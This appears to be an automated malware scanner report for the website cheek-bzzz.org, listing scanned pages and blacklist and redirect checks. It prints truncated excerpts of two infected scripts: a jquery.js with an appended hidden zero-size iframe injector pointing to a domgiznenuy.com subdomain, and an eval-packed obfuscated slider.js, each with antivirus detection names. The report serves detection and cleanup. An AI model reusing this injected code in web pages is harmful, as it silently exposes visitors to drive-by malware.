New scan:

Malware Scanner report for cheek-bzzz.org

Malicious/Suspicious/Total urls checked
2/1/15
3 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.cheek-bzzz.org/
200 OK
Content-Length: 243743
Content-Type: text/html
suspicious
Suspicious code found

</span>

http://www.cheek-bzzz.org/engine/classes/min/index.php?charset=windows-1251&g=general&1
200 OK
Content-Length: 19334
Content-Type: application/x-javascript
clean
http://www.cheek-bzzz.org/engine/classes/min/index.php?charset=windows-1251&f=engine/classes/highslide/highslide.js&1
200 OK
Content-Length: 56921
Content-Type: application/x-javascript
clean
http://www.cheek-bzzz.org/templates/cheekbzzz/css/crawler.js
200 OK
Content-Length: 9850
Content-Type: application/javascript
clean
http://www.cheek-bzzz.org/engine/skins/default.js
200 OK
Content-Length: 3412
Content-Type: application/javascript
clean
http://www.cheek-bzzz.org/js/jquery.js
200 OK
Content-Length: 57980
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document
... 56913 bytes are skipped ...
20) + 5)+'.'+'domgiznenuy.com/';if2omo.style.width = '0px';if2omo.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if2omo=') == -1) {document.cookie = 'if2omo=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if2omo);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}

Antivirus reports:

Avast
JS:Iframe-DUA [Trj]
Fortinet
JS/IFrame.IS!tr
Sophos
Troj/JSRedir-LR

http://www.cheek-bzzz.org/js/slider.js
200 OK
Content-Length: 4773
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(34).2X(2(){l g=2(){n!(3j 3n(1f.2v(2F,2N,1Q,3h,1j,1j,1j,2b,1T,3c,1Q,1V,1d,2J,2L,1d,2k,2P,1d,2k,2b,1T,2S,1V,2U),\'i\')).33(3d.3f)};8(g()||$(\'#F\').M==0)n;l h={2M:\'Ýêñ
... 3812 bytes are skipped ...
|clone|prev|Math|140|catch|rmaley|substring|fromCharCode|paddingTop|preloadImg|firsst|appendTo|Uniongang|throw|vnmo|body|flashvars|0x5e|400|movie|browser|0x69|pic|0x6f|copyright|0x28|Ru|0x61|160|trailer|0x72|else|0x24|allowfullscreen|clearInterval|ready|try|setTimeout||flashTrailer|300|test|document|not|msie|allowFullScreen|prepend|flashVars|gif|append|0x29|location|_|host|slideUp|0x3a|slideDown|new|min|embed|author|RegExp|icon|type|cpr|application|indexOf|open|shockwave|flash'.split('|'),0,{}))

Antivirus reports:

Rising
JS:Malware.JCrypto!1.9C12
TrendMicro
HEUR_HTJS.HDJSFN

http://www.cheek-bzzz.org/js/accordion.js
200 OK
Content-Length: 1330
Content-Type: application/javascript
clean
http://www.cheek-bzzz.org/js/resizer.js
200 OK
Content-Length: 2970
Content-Type: application/javascript
clean
http://www.cheek-bzzz.org/js/tooltips.js
200 OK
Content-Length: 4805
Content-Type: application/javascript
clean
http://www.cheek-bzzz.org//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/
404 Not Found
Content-Length: 45621
Content-Type: text/html
clean
http://www.cheek-bzzz.org//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/engine/skins/default.js/
404 Not Found
Content-Length: 45621
Content-Type: text/html
clean
http://www.cheek-bzzz.org//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/engine/skins/default.js/engine/skins/default.js/
404 Not Found
Content-Length: 45621
Content-Type: text/html
clean
http://www.cheek-bzzz.org//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/engine/skins/default.js/engine/skins/default.js/engine/skins/default.js/
404 Not Found
Content-Length: 45621
Content-Type: text/html
clean
http://www.cheek-bzzz.org//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/engine/skins/default.js/engine/skins/default.js/engine/skins/default.js/engine/skins/default.js/
404 Not Found
Content-Length: 45621
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cheek-bzzz.org

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: cheek-bzzz.org
Referer: http://www.google.com/search?q=cheek-bzzz.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cheek-bzzz.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cheek-bzzz.org/

Result: cheek-bzzz.org is not infected or malware details are not published yet.